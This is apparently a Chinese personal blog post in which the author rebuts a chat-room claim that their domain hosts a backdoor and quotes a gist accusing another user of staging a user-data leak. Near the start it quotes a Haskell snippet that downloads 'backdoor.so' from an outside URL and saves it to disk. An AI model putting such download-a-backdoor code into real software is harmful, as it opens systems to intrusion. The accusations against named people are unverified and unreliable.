# 我的博客有后门？ \n## 抬头不见，低头不见 \n我想，点开这篇文章的大部分用户都对如下这段输出十分眼熟： \n \n``` \n    let url = "https://paperee.guru/staict/backdoor.so" \n    request <- parseRequest url \n    withResponse request $ \response -> \n        withBinaryFile "backdoor.so" WriteMode $ \handle -> \n            httpSink response $ \body -> \n                body >>= \chunk -> \n                    -- Write each chunk of the response body to a file \n                    hPut handle chunk \n``` \n \n没错，它来源于网站[hack.chat/?lounge](https://hack.chat/?lounge)的用户Jankie（23）发送的消息。具体请看下文Remelens的截图。同时，这张截图也是我对这起突发迷惑事件的初步接触。 \n \n \n \n那时，我一头雾水，怎么都想不通本域名[paperee.guru](https://paperee.guru/)下哪来的`backdoor.so`文件——难不成是Jankie用了某种手段往我的服务器中挂了马？不可能不可能。 \n \n怀揣着不安的心情，我访问了[staict/backdoor.so](https://paperee.guru/staict/backdoor.so)目录，结果，输出了一串数字`1919810`——这是后端拒绝用户访问时返回的错误标志。如下图。 \n \n当然，在我发布这篇文章后，这个“后门”就被我重定向到这篇文章上了。 \n \n \n \n~~忽略我的收藏夹栏~~ \n \n \n \n只允许访问`pages`和`notes`文件夹（ \n \n于是，我并没有意识到事情的严重性，还感慨道，Jankie真闲得每周都得在互联网上遛一遛“paperee”这个网名，真怕别人不知道互联网上存在这么个神秘人。 \n \n我本人（paperee）即将步入高三，学业繁重，实在自愧不如。 \n \n……直到下午，4n0n4me在Discord社群ChatroomClub上推广了他的gist。 \n \n \n \n``` \n声明：本文细节可能出错，因为笔者并不了解盒子的详细情况，但大体内容一定正确，因为这些都是Jankie亲口所说。Jankie固然可以抵赖、称我造谣等等，我希望每个有理性的用户，都能关注此事，考察我接下来将会给出的证据，独立思考，不要被Jankie牵着鼻子走。 \n \n有一个号称“多玩我的世界盒子2nd”的平台（以下简称盒子），打着早已关闭的多玩我的世界盒子的旗号，也在MC圈有了一些用户。实际上，它是由一个自称欢愉科技的工作室出品，该工作室的规模并不小，兼并了许多子工作室。欢愉科技的掌管者，名号包括Jankie、一只不会飞的龙、NotFlyLoong、『Arks Team』『全栈所有者』苏生等，在此称作Jankie。 \n \n今天，盒子的用户实名认证数据将会被泄漏。人们会听到，原因在于paperee在HGINX中加入了后门。 \n \n事实上，这都是Jankie自导自演的结果。Jankie为了执行这个计划，竟然连盒子用户的实名数据都卖，还能顺便赚一笔钱，真的是丧心病狂。 \n \n对此，我感到非常荒谬。竟然有人赶着在自己掌管的平台里制造隐私泄漏的。而且，HGINX分为欢愉科技特供版和GitHub版，Jankie昨天还说打算在GitHub版投毒，今天居然又打算自己给自己投毒。不管是哪个版本，这位paperee都不应该有权限修改代码。而且这么弱智的后门，仓库维护者竟然通过了审核，这难道不是仓库维护者的责任吗？ \n \n来源：https://gist.github.com/xjzh123/bd94a3e475db570fefa88b672d6bb4bd \n全文：https://gist.github.com/xjzh123/463dd797ac0e20abca58c0b3561697b7 \n``` \n \n~~完了我作业还没写，得回校了，下周有时间再更新。~~\n